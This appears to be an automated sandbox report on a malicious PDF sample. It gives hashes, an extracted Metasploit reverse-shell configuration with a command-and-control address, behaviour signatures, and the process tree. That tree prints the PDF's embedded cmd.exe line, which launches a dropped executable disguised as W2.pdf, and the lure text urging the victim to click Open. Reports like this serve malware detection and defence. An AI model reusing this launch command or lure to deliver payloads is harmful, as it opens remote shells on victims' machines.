Analysis

  • max time kernel
    121s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    11/10/2024, 20:05

General

  • Target

    369614d7c422201f2d1605f4befd452d_JaffaCakes118.pdf

  • Size

    70KB

  • MD5

    369614d7c422201f2d1605f4befd452d

  • SHA1

    f963c4f78cf00f6440774b1b6fe992ab03020151

  • SHA256

    e4fa730d00839aaaf4ae00fef4ab0854beccabfeb2541662a5391be85c48375c

  • SHA512

    77c2bf3c2bb27f884f73eab7d69396438e52ce2c16928656128336eaefde46849af9e51d79f69163a4af1b2f7339f2dd85d692946c0fbab8dd142f5f84da8cc9

  • SSDEEP

    1536:KU29hNtvMaKEjiY29XUm3TZo8jTLQBGYsU4CpxpBHZZMTD9:KU2AaK/3TZHLQQmpfO

Malware Config

Extracted

Family

metasploit

Version

windows/shell_reverse_tcp

C2

199.73.28.114:4444

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 31 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\369614d7c422201f2d1605f4befd452d_JaffaCakes118.pdf"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2128
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\W2.pdf" (cd "Desktop"))&(if exist "My Documents\W2.pdf" (cd "My Documents"))&(if exist "Documents\W2.pdf" (cd "Documents"))&(start W2.pdf) To view the encrypted content please tick the "Do not show this message again" box and press Open.
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2812
      • \??\c:\Users\Admin\Documents\W2.pdf
        W2.pdf
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2980

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

          Filesize

          3KB

          MD5

          4296e0286f331d06ce022fb65c38f8c1

          SHA1

          91bac49377deb430e8b4df2562e222c1e233ac13

          SHA256

          7b0b029dfec76df99f08e74519848efa78f4338edc660aba6c78095c7b326c14

          SHA512

          69dcf0f9b21ca3332decb26b1d9f8c0aaf7c3b060aa46b47f0519467f3be322a90555b64416c0fdbaf0288762a30f2d6b7ec3f0e3e669d8a1831de5a4ca09eff

        • C:\Users\Admin\Documents\W2.pdf

          Filesize

          72KB

          MD5

          e46a49d8269602b3d569fe84b65e494a

          SHA1

          41163a1afa86e4746f5ee611f5208d8778160c1e

          SHA256

          43bc71586e3edc838ab9616695814257b6d3ca217a1e09418b24274627674a6a

          SHA512

          b473d7ecb2c34793c0e0bb82e43894cd179c4afe3edca52aed89d8e4a41d6e596555211dff815b7fb68f1ccd2fdccf1234f2653c9f70a83517d3ec673a41828a